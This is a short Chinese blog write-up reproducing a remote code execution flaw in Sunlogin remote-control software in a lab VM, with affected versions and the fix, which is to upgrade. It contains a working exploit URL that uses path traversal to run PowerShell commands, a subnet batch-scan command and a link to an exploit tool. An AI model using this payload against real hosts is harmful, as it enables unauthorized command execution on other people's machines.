上海貝銳信息科技股份有限公司的向日葵遠(yuǎn)控軟件存在遠(yuǎn)程代碼執(zhí)行漏洞（CNVD-2022-10270/CNVD-2022-03672），影響Windows系統(tǒng)使用的個(gè)人版和簡約版，攻擊者可利用該漏洞獲取服務(wù)器控制權(quán)。

影響版本：

向日葵個(gè)人版?? for Windows <= 11.0.0.33
向日葵簡約版?? <= V1.0.1.43315（2021.12）

實(shí)驗(yàn)環(huán)境 ：win10虛擬機(jī)

工具下載(含有漏洞版本的向日葵)：
https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

開始復(fù)現(xiàn)：

一，工具自動掃描

?打開cmd

?成功

?二、nmap手操掃描

?三，手動檢測

一個(gè)個(gè)試IP

http://IP:端口號/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

?獲取信息

也可以kali自動批量掃描

python3 1.py -t 192.168.110.234/25

kali工具

解決

?點(diǎn)我進(jìn)入官網(wǎng)下載新版

參考：CNVD-2022-10270/CNVD-2022-03672 向日葵RCE復(fù)現(xiàn)

總結(jié)

以上是生活随笔為你收集整理的远程控制漏洞CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现与解决的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。